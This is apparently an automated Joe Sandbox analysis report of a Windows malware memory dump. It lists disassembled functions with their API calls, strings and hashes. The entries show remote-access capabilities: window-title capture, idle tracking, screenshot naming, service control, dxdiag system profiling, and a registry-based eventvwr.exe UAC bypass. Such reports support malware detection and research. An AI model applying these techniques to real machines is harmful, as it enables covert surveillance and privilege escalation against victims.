TLS Error 3, xrefs: 004049B8
Connection Refused, xrefs: 00404A56
Connection Failed: , xrefs: 00404A23
TLS Error 2, xrefs: 00404935

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

Function 00452DBB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
__dosmaperr.LIBCMT ref: 00452ED6
GetFileType.KERNEL32(00000000), ref: 00452EE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
__dosmaperr.LIBCMT ref: 00452EF5
CloseHandle.KERNEL32(00000000), ref: 00452F15
CloseHandle.KERNEL32(00000000), ref: 0045305F
GetLastError.KERNEL32 ref: 00453091
__dosmaperr.LIBCMT ref: 00453098

Strings

H, xrefs: 0045301D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A

Function 00450F63 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0045100F
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
__alloca_probe_16.LIBCMT ref: 004510CA
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
__alloca_probe_16.LIBCMT ref: 00451174
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
__freea.LIBCMT ref: 004511E3
__freea.LIBCMT ref: 004511EF

Strings

e]j[/, xrefs: 00450F6B

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: e]j[/
API String ID: 201697637-424226671
Opcode ID: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
Opcode Fuzzy Hash: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768

Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 004136B6, 004136BE, 004136C2
65535, xrefs: 00413609

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E

Function 00409C1F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00409C81
Sleep.KERNEL32(000001F4), ref: 00409C8C
GetForegroundWindow.USER32 ref: 00409C92
GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
Sleep.KERNEL32(000003E8), ref: 00409D9D

Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A

Strings

[, xrefs: 00409D37
minutes }, xrefs: 00409DC3
], xrefs: 00409D31
{ User has been idle for , xrefs: 00409DCF

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A

Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753

Strings

AppData, xrefs: 0040C70A
WinDir, xrefs: 0040C654, 0040C676, 0040C6C8
\system32, xrefs: 0040C667
Temp, xrefs: 0040C61F
SystemDrive, xrefs: 0040C64A
\SysWOW64, xrefs: 0040C6B9
ProgramData, xrefs: 0040C718
ProgramFiles, xrefs: 0040C727
UserProfile, xrefs: 0040C711

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
Opcode Fuzzy Hash: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
__dosmaperr.LIBCMT ref: 00438646
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
__dosmaperr.LIBCMT ref: 00438683
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
__dosmaperr.LIBCMT ref: 004386D7
_free.LIBCMT ref: 004386E3
_free.LIBCMT ref: 004386EA

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
Opcode Fuzzy Hash: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69

Function 00446FC4 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
__alloca_probe_16.LIBCMT ref: 00447056
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
__alloca_probe_16.LIBCMT ref: 0044713B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
__freea.LIBCMT ref: 004471AB

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

__freea.LIBCMT ref: 004471B4
__freea.LIBCMT ref: 004471D9

Strings

e]j[/, xrefs: 00446FCB

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID: e]j[/
API String ID: 3864826663-424226671
Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8

Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DC74
_free.LIBCMT ref: 0044DC82
_free.LIBCMT ref: 0044DDB0
_free.LIBCMT ref: 0044DDBB

Strings

tF, xrefs: 0044DE0C
pF, xrefs: 0044DC30, 0044DDF5

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF$tF
API String ID: 269201875-2954683558
Opcode ID: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
Opcode Fuzzy Hash: 0017408d32ff71f8327e26c25c7248eb33913fce7ae2350609d9814c511e4433
Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58

Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040549F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
TranslateMessage.USER32(?), ref: 0040555E
DispatchMessageA.USER32(?), ref: 00405569
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

DisplayMessage, xrefs: 004055CC
GetMessage, xrefs: 004055D8
CloseChat, xrefs: 004055E9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
Opcode Fuzzy Hash: f61965f1cc9c9e7f95a47c597eceb50cc1da7838f2ae86f95f0e5e0772039054
Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A

Function 004530E4 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107

Strings

log, xrefs: 004531AD, 004531B9
sqrt, xrefs: 0045328B
e]j[/, xrefs: 004530EC
exp, xrefs: 004531CC, 0045322E
asin, xrefs: 00453273
pow, xrefs: 004531EB, 00453297, 004532AA
log10, xrefs: 00453151, 004531A1
acos, xrefs: 0045327F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$e]j[/$exp$log$log10$pow$sqrt
API String ID: 3527080286-145979381
Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D

Function 0041601D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
CloseHandle.KERNEL32(00000000), ref: 00416123
DeleteFileA.KERNEL32(00000000), ref: 00416132
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

Strings

@%G, xrefs: 0041615F
<, xrefs: 004160C1
@, xrefs: 004160C8
@%G, xrefs: 004160F3
Temp, xrefs: 0041603E

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$@%G$@%G$Temp
API String ID: 1704390241-4139030828
Opcode ID: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
Opcode Fuzzy Hash: 2c1979de410b9738e481fa727b302a0dd89e2ec540be45fee9571ea6700d777e
Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99

Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
Opcode Fuzzy Hash: c0ea185af2b6cb95e5d246b028910c14a7565b46c2d114a674b25013468a4f31
Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5

Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445645

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00445651
_free.LIBCMT ref: 0044565C
_free.LIBCMT ref: 00445667
_free.LIBCMT ref: 00445672
_free.LIBCMT ref: 0044567D
_free.LIBCMT ref: 00445688
_free.LIBCMT ref: 00445693
_free.LIBCMT ref: 0044569E
_free.LIBCMT ref: 004456AC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88

Function 0044268B Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_memcmp.LIBVCRUNTIME ref: 00442935
_free.LIBCMT ref: 004429A6
_free.LIBCMT ref: 004429BF
_free.LIBCMT ref: 004429F1
_free.LIBCMT ref: 004429FA
_free.LIBCMT ref: 00442A06

Strings

C, xrefs: 004427F3
e]j[/, xrefs: 00442696

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C$e]j[/
API String ID: 1679612858-2883137480
Opcode ID: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
Opcode Fuzzy Hash: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44

Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417F6F
GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
Sleep.KERNEL32(000003E8), ref: 004180B3
GetLocalTime.KERNEL32(?), ref: 004180BB
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00418050, 00418071, 004180DF
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00418055

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
Opcode Fuzzy Hash: e53bd955e1239445be9f05899463632c52afdf35a26c57d2f447966bafceb32c
Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799

Function 0040971E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00409738

Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
GetFileAttributesW.KERNEL32(00000000), ref: 00409785
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,00000000,00000000,00000000), ref: 0040991F

Strings

H"G, xrefs: 004097EF
H"G, xrefs: 004097FA

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: H"G$H"G
API String ID: 3795512280-1424798214
Opcode ID: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
Opcode Fuzzy Hash: 671ef836078558126b4631db4dc3394edfc305a4d04f8952e6c39a6f844ac237
Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A

Function 00447757 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
__fassign.LIBCMT ref: 00447814
__fassign.LIBCMT ref: 0044782F
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD

Strings

e]j[/, xrefs: 0044775F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: e]j[/
API String ID: 1324828854-424226671
Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69

Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228

Sleep.KERNEL32(00000064), ref: 00415A46
DeleteFileW.KERNEL32(00000000), ref: 00415A7A

Strings

temp, xrefs: 004159CA
/t , xrefs: 004159F9
dxdiag, xrefs: 00415A0F
open, xrefs: 00415A14
\sysinfo.txt, xrefs: 004159C5

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99

Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
ExitProcess.KERNEL32 ref: 00406782

Strings

H"G, xrefs: 004066E8
open, xrefs: 0040676E
Software\Classes\mscfile\shell\open\command, xrefs: 0040673F
eventvwr.exe, xrefs: 0040674F
mscfile\shell\open\command, xrefs: 004066D4
origmsc, xrefs: 00406710

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

